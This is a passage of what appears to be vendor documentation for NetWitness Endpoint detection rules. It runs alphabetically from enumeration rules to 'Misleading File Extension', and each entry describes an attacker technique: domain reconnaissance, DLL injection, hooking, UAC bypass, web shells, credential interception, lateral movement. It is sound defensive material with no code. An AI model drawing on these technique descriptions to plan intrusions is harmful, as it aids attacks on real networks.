* NetWitness Endpoint Server

GENERATED META KEYS
* boc = enables rdp from command-line
Enumerates ARP Tableenumerates_arp_tableEnumeration of ARP table can be an indication of someone trying to discover potential attack vectors in the system, and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = enumerates arp table
Enumerates Available Systems On Networkenumerates_available_systems_on_networkEnumeration of available systems on network can be an indication of someone trying to discover potential attack vectors in the system, and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = enumerates available systems on network
Enumerates Domain Account Policyenumerates_domain_account_policyEnumeration of domain account policy can be an indication of someone trying to discover potential attack vectors in the system, and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = enumerates domain account policy
Enumerates Domain Administratorsenumerates_domain_administratorsEnumeration of domain administrators can be an indication of someone trying to discover potential attack vectors in the system, and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = enumerates domain administrators
Enumerates Domain Computersenumerates_domain_computersEnumeration of domain computers can be an indication of someone trying to discover potential attack vectors in the system, and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = enumerates domain computers
Enumerates Domain Controllersenumerates_domain_controllersEnumeration of domain controllers can be an indication of someone trying to discover potential attack vectors in the system, and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = enumerates domain controllers
Enumerates Domain Groupsenumerates_domain_groupsEnumeration of domain groups can be an indication of someone trying to discover potential attack vectors in the system, and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = enumerates domain groups
Enumerates Domain Usersenumerates_domain_usersEnumeration of domain users can be an indication of someone trying to discover potential attack vectors in the system, and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = enumerates domain users
Enumerates Enterprise Administratorsenumerates_enterprise_administratorsEnumeration of enterprise administrators can be an indication of someone trying to discover potential attack vectors in the system, and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = enumerates enterprise administrators
Enumerates Exchange Domain Serversenumerates_exchange_domain_serversEnumeration of exchange domain servers can be an indication of someone trying to discover potential attack vectors in the system, and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = enumerates exchange domain servers
Enumerates Exchange Serversenumerates_exchange_serversEnumeration of exchange servers can be an indication of someone trying to discover potential attack vectors in the system, and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = enumerates exchange servers
Enumerates IP Configurationenumerates_ip_configurationEnumeration of IP configuration can be an indication of someone trying to discover potential attack vectors in the system, and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = enumerates ip configuration
Enumerates Local Account Policyenumerates_local_account_policyEnumeration of local account policy can be an indication of someone trying to discover potential attack vectors in the system, and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = enumerates local account policy
Enumerates Local Administratorsenumerates_local_administratorsEnumeration of local administrators can be an indication of someone trying to discover potential attack vectors in the system, and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = enumerates local administrators
Enumerates Local Administrators On Domain Controllerenumerates_local_administrators_on_domain_controllerEnumeration of local administrators on domain controller can be an indication of someone trying to discover potential attack vectors in the system, and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = enumerates local administrators on domain controller
Enumerates Local Groupsenumerates_local_groupsEnumeration of local groups can be an indication of someone trying to discover potential attack vectors in the system, and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = enumerates local groups
Enumerates Local Servicesenumerates_local_servicesEnumeration of local services can be an indication of someone trying to discover potential attack vectors in the system, and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = enumerates local services
Enumerates Local Usersenumerates_local_usersEnumeration of local users can be an indication of someone trying to discover potential attack vectors in the system, and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = enumerates local users
Enumerates Logical Diskenumerates_logical_diskEnumeration of logical disk can be an indication of someone trying to discover potential attack vectors in the system, and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = enumerates logical disk
Enumerates Mapped Resourcesenumerates_mapped_resourcesEnumeration of mapped resources can be an indication of someone trying to discover potential attack vectors in the system, and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = enumerates mapped resources
Enumerates Network Connectionsenumerates_network_connectionsEnumeration of network connections can be an indication of someone trying to discover potential attack vectors in the system, and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = enumerates network connections
Enumerates Primary Domain Controllerenumerates_primary_domain_controllerEnumeration of primary domain controller can be an indication of someone trying to discover potential attack vectors in the system, and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = enumerates primary domain controller
Enumerates Processes On Local Systemenumerates_processes_on_local_systemEnumeration of processes on local system can be an indication of someone trying to discover potential attack vectors in the system, and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = enumerates processes on local system
Enumerates Processes On Remote Systemenumerates_processes_on_remote_systemEnumeration of processes on local system can be an indication of someone trying to discover potential attack vectors in the system, and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = enumerates processes on remote system
Enumerates Remote Netbios Name Tableenumerates_remote_netbios_name_tableEnumeration of remote netbios name table can be an indication of someone trying to discover potential attack vectors in the system, and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = enumerates remote netbios name table
Enumerates Remote Resourcesenumerates_remote_resourcesEnumeration of remote resources can be an indication of someone trying to discover potential attack vectors in the system, and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = enumerates remote resources
Enumerates Route Tableenumerates_route_tableEnumeration of routing table can be an indication of someone trying to discover potential attack vectors in the system, and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = enumerates route table
Enumerates Services Hosted In Processesenumerates_services_hosted_in_processesEnumeration of services hosted in processes can be an indication of someone trying to discover potential attack vectors in the system, and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = enumerates services hosted in processes
Enumerates System Infoenumerates_system_infoEnumeration of system information can be an indication of someone trying to discover potential attack vectors in the system, and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = enumerates system info
Enumerates Trusted Domainsenumerates_trusted_domainsEnumeration of trusted domains can be an indication of someone trying to discover potential attack vectors in the system, and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = enumerates trusted domains
Evasive Powershell Used Over Networkevasive_powershell_used_over_networkThis rule will trigger when PowerShell with evasive options will be detected through a network event. Automated tools like PowerShell Empire run evasive remote PowerShell commands through network. Adversaries can use such technique for execution while evading defenses.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 (Investigation Only)
* NetWitness Platform 11.4 and higher (Full Support)

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = evasive powershell used over network
Event Viewer Executes Uncommon Binaryevent_viewer_executes_uncommon_binaryEvent viewer executing uncommon binary can be an indication of possible Windows User Account Control (UAC) bypass. Attacker can use these techniques to elevate privileges to administrator if the target process is unprotected. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = event viewer executes uncommon binary
Executable In ADSexecutable_in_adsLeveraging Alternate Data Streams can be a way to mask a malicious file inside a data stream of another binary, which can then be executed by launching the file it is forked into
Explorer Public Folder DLL Loadexplorer_public_folder_dll_loadThis rule will return hits from 'explorer.exe' launching the Windows OS process 'rundll32.exe' that leverages the folders "Public\\Libraries" or 'ClassWindow'

VERSIONS SUPPORTED
* NetWitness Platform 11.3 (Investigation Only)
* NetWitness Platform 11.4 and higher (Full Support)

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = explorer public folder dll load
Exports Sensitive Registry Hiveexports_sensitive_registry_hiveExporting sensitive registry hive can be indication of someone trying to exploit these credentials and registry values to be able to gain a privileged foothold, allowing them unfettered access to elevate privileges and move about the network freely without detection.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = exports sensitive registry hive
Extracts Password-Protected Archiveextracts_password-protected_archivePassword-protected archive files can be used to secure sensitive data since contents cannot be examined.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = extracts password-protected archive
File Encryptedfile_encryptedFile is encrypted before being exfiltrated in order to hide the information that is being exfiltrated from detection or to make the exfiltration less conspicuous upon inspection by a defender.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = file encrypted
File Hiddenfile_hiddenTo prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a hidden file. Adversaries can use this to their advantage to hide files and folders anywhere on the system for persistence and evading a typical user or system analysis that does not incorporate investigation of hidden files.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = file hidden
File Path Not Part Of RPMfile_path_not_part_of_rpmInstallation or updates of software on Linux systems is typically done through an RPM. Executables outside of this packing format could be considered suspicious.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = file path not part of rpm
File Path Not Part Of RPM In Important System Directoryfile_path_not_part_of_rpm_in_important_system_directoryInstallation or updates of software on Linux systems is typically done through an RPM. Executables outside of this packing format could be considered suspicious.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = file path not part of rpm in important system directory
File Vault Disabledfile_vault_disabledFileVault full-disk encryption (FileVault 2) uses XTS-AES-128 encryption with a 256-bit key to help prevent unauthorized access to the information on your startup disk. Disabling this feature will decrypt the information on your startup disk.
Floating Modulefloating_moduleDetects a floating code module as a result of DLL injection. This may result in an attacker gaining access to internal resources, escalating privileges or disguising malicious behavior under a legitimate process.
Floating Module And Hookingfloating_module_and_hookingDetects floating code as a result of hooking. The attacker masks malicious behavior under the process.
Floating Module In Browser Processfloating_module_in_browser_processDetects a floating code module as a result of DLL injection. The attacker masks malicious behavior under the legitimate browser process.
Floating Module In OS Processfloating_module_in_os_processDetects a floating code module as a result of DLL injection. The attacker masks malicious behavior under the legitimate OS process.
Gatekeeper Disabledgatekeeper_disabledGatekeeper is a security feature of the Mac OS operating system. It enforces code signing and verifies downloaded applications before allowing them to run, thereby reducing the likelihood of inadvertently executing malware.
Gets Current User As SYSTEMgets_current_user_as_systemTrying to find current user as SYSTEM can be an indication of someone trying to discover potential attack vectors in the system , and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = gets current user as system
Gets Current Usernamegets_current_usernameTrying to find current username information can be an indication of someone trying to discover potential attack vectors in the system , and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = gets current username
Gets Current Username And Group Informationgets_current_username_and_group_informationTrying to find current username and group information can be an indication of someone trying to discover potential attack vectors in the system , and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = gets current username and group information
Gets Hostnamegets_hostnameEnumeration of hostnames can be an indication of someone trying to discover potential attack vectors in the system, and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = gets hostname
Gets Remote Timegets_remote_timegetting remote time can be an indication of someone trying to gather information that could be useful for performing other techniques, such as executing a file with a Scheduled Task, or to discover locality information based on time zone to assist in victim targeting.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = gets remote time
GINA Replacementgina_replacementGINA is the Graphical Identification and Authentication component of Windows and handles the logon screen that we're all familiar with. GINA DLL can be replaced with another DLL to intercept credentials.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = gina replacement
Graylisted Filegraylisted_fileAn analyst may mark files as graylisted within NetWitness Endpoint. If actions on an endpoint involve those graylisted files as the source, then this rule will trigger.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = graylisted file
Hidden And Hookinghidden_and_hookingHooking may be used to intercept and execute code in response to events. If the file is hidden, this could indicate an attempt is being made to evade detection by an attacker.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 (Investigation Only)
* NetWitness Platform 11.4 and higher (Full Support)

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = hidden and hooking
Hidden In AppDatahidden_in_appdataProcess injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Hidden Plist And Autorunhidden_plist_and_autorunplist (Property List) is a flexible and convenient format for storing application data. Adversaries can modify these plist files to point to their own code, can use them to execute their code in the context of another user, bypass whitelisting procedures, or even use them as a persistence mechanism.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = hidden plist and autorun
Hidden Running As Roothidden_running_as_rootA file is typically hidden to prevent users from accidentally changing them on a filesystem. A hidden file running with root privileges may indicate an attacker behavior to evade detection and install malware to maintain persistence.
Hooks Audio Output Functionhooks_audio_output_functionA hook is a process which can intercept actions from an application such as keystrokes, networking and files. These intercepted functions fall to a hook procedure, which can then change or reject the event.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = hooks audio output function
Hooks Authentication Functionhooks_authentication_functionA hook is a process which can intercept actions from an application such as keystrokes, networking and files. These intercepted functions fall to a hook procedure, which can then change or reject the event.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = hooks authentication function
Hooks Crypto Functionhooks_crypto_functionA hook is a process which can intercept actions from an application such as keystrokes, networking and files. These intercepted functions fall to a hook procedure, which can then change or reject the event.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = hooks crypto function
Hooks DnsQuery Functionhooks_dnsquery_functionA hook is a process which can intercept actions from an application such as keystrokes, networking and files. These intercepted functions fall to a hook procedure, which can then change or reject the event.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = hooks dnsquery function
Hooks GUI Functionhooks_gui_functionA hook is a process which can intercept actions from an application such as keystrokes, networking and files. These intercepted functions fall to a hook procedure, which can then change or reject the event.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = hooks gui function
Hooks Network HTTP Functionhooks_network_http_functionA hook is a process which can intercept actions from an application such as keystrokes, networking and files. These intercepted functions fall to a hook procedure, which can then change or reject the event.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = hooks network http function
Hooks Network IO Functionhooks_network_io_functionA hook is a process which can intercept actions from an application such as keystrokes, networking and files. These intercepted functions fall to a hook procedure, which can then change or reject the event.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = hooks network io function
Hooks NtLdr Functionhooks_ntldr_functionA hook is a process which can intercept actions from an application such as keystrokes, networking and files. These intercepted functions fall to a hook procedure, which can then change or reject the event.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = hooks ntldr function
Hooks Registry Access Functionhooks_registry_access_functionA hook is a process which can intercept actions from an application such as keystrokes, networking and files. These intercepted functions fall to a hook procedure, which can then change or reject the event.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = hooks registry access function
Hooks Registry Enumeration Functionhooks_registry_enumeration_functionA hook is a process which can intercept actions from an application such as keystrokes, networking and files. These intercepted functions fall to a hook procedure, which can then change or reject the event.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = hooks registry enumeration function
HTTP Daemon Runs Command Prompthttp_daemon_runs_command_promptHTTP daemon running command prompt can be an indication of web shell trying to run malicious commands which may may serve as Redundant Access or as a persistence mechanism in case an adversary's primary access methods are detected and removed.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = http daemon runs command prompt
HTTP Daemon Runs Powershellhttp_daemon_runs_powershellHTTP daemon running powershell can be an indication of web shell trying to run malicious commands which may may serve as Redundant Access or as a persistence mechanism in case an adversary's primary access methods are detected and removed.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = http daemon runs powershell
HTTP Daemon Runs Reconnaissance Toolhttp_daemon_runs_reconnaissance_toolHTTP daemon running reconnaissance tool can be an indication of web shell trying to run malicious commands which may may serve as Redundant Access or as a persistence mechanism in case an adversary's primary access methods are detected and removed.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = http daemon runs reconnaissance tool
HTTP Daemon Writes Executablehttp_daemon_writes_executableHTTP daemon running writing executable can be an indication of web shell trying to run malicious commands which may may serve as Redundant Access or as a persistence mechanism in case an adversary's primary access methods are detected and removed.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = http daemon writes executable
IE DEP Disabledie_dep_disabledDisabling IE DEP can be a indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = ie dep disabled
IE Enhanced Security Disabledie_enhanced_security_disabledDisabling IE enhanced security can be a indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = ie enhanced security disabled
In AppData Directoryin_appdata_directoryThese locations are used often by malware authors to store malicious payloads, with autoruns in place to ensure persistence.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = in appdata directory
In Hidden Directoryin_hidden_directoryTo prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a hidden file. Adversaries can use this to their advantage to hide files and folders anywhere on the system for persistence and evading a typical user or system analysis that does not incorporate investigation of hidden files.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = in hidden directory
In Recycle Bin Directoryin_recycle_bin_directoryA file found in recycle bin directory may be suspicious.
In Root Of AppDataLocal Directoryin_root_of_appdatalocal_directoryThese locations are used often by malware authors to store malicious payloads, with autoruns in place to ensure persistence.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = in root of appdatalocal directory
In Root Of AppDataRoaming Directoryin_root_of_appdataroaming_directoryThese locations are used often by malware authors to store malicious payloads, with autoruns in place to ensure persistence.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = in root of appdataroaming directory
In Root Of Logical Drivein_root_of_logical_driveWhile the majority of programs are stored in folders on a system, it is uncommon to see a binary in the root of for example, "C:" directory.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file boc = in root of logical drive
In Root Of Program Directoryin_root_of_program_directoryThese locations are used often by malware authors to store malicious payloads, with autoruns in place to ensure persistence.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = in root of program directory
In Root Of Users Directoryin_root_of_users_directoryThese locations are used often by malware authors to store malicious payloads, with autoruns in place to ensure persistence.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file boc = in root of users directory
In System Volume Information Directoryin_system_volume_information_directory

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = in system volume information directory
In Temporary Directoryin_temporary_directoryThese locations are used often by malware authors to store malicious payloads, with autoruns in place to ensure persistence.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = in temporary directory
In Uncommon Directoryin_uncommon_directoryA file found in an uncommon directory may be suspicious.
Installs Root Certificateinstalls_root_certificateInstalling root certificate on a compromised system can be an indication of an adversary trying to compromise the integrity of the security solution, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = installs root certificate
Invalid Signatureinvalid_signatureThis indicates that code may have been altered or corrupted since it was signed.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = invalid signature
Kext Signature Validation Disabledkext_signature_validation_disabledKext signature validation is a code signing requirement for all extensions and drivers located in the extensions folder. Disabling that feature may expose the system to unsigned rootkits or other malware.
Lateral Movement With Credentials Using Net Utilitylateral_movement_with_credentials_using_net_utilityThis rule is looking for instance of 'net use' being leveraged with username and/or passwords being passed. This technique is leveraged when attackers gain access to a network and obtain credentials to use to laterally move from system to system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 (Investigation Only)
* NetWitness Platform 11.4 and higher (Full Support)

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc =lateral movement with credentials using net utility
LD Preloadld_preloadEnvironment variables can be used to dynamically load a library in a process which can be used to intercept API calls from the running process.
Library Preferences Directorylibrary_preferences_directory"Adversaries can use list of specific applications to run when a user logs in. These login items are stored in the users ~/Library/Preferences/ directory in a plist file called com.apple.loginitems.plist

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = library preferences directory"
Lists Anti-Spyware Productslists_anti-spyware_productsListing anti-spyware products can be an indication of someone trying to discover potential attack vectors in the system, and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = lists anti-spyware products
Lists Antivirus Productslists_antivirus_productsListing antivirus products can be an indication of someone trying to discover potential attack vectors in the system, and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = lists antivirus products
Lists Firewall Productslists_firewall_productsListing firewall products can be an indication of someone trying to discover potential attack vectors in the system, and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = lists firewall products
Login Bypass Configuredlogin_bypass_configuredAccessibility features that may be launched with a key combination before a user has logged in . A login bypass can be an indicator of someone trying to modify the way these programs are launched to maintain a persistent presence on the system which can escalate privileges and create backdoor without logging in to the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = login bypass configured
LUA Disabledlua_disabledWindows User Account Controls (UAC) will not notify the user when programs try to make changes to the computer. UAC was formerly known as Limited User Account (LUA). This can be an attempt to bypass UAC.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = lua disabled
Mac Firewall Disabledmac_firewall_disabledDisabling firewall can be a indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine incident occurred.
Malicious File By Reputation Servicemalicious_file_by_reputation_serviceFiles reported as malicious by reputation service indicates execution of files and hashes of which are tagged as malicious.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* ioc = malicious file by reputation service
Maps Administrative Sharemaps_administrative_shareMapping administrative share can be an indicator of someone trying for lateral movement or privilege escalation by using hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions
Maps IPC$ Sharemaps_ipc$_shareMapping IPC$ share can be an indicator of someone trying for lateral movement or privilege escalation by using hidden IPC$ shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = maps ipc$ share
Misleading File Extensionmisleading_file_extensionMisleading file extension can be an indication of someone pretending to be an authorized file extension in order to gain access or to gain greater privileges than authorized.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
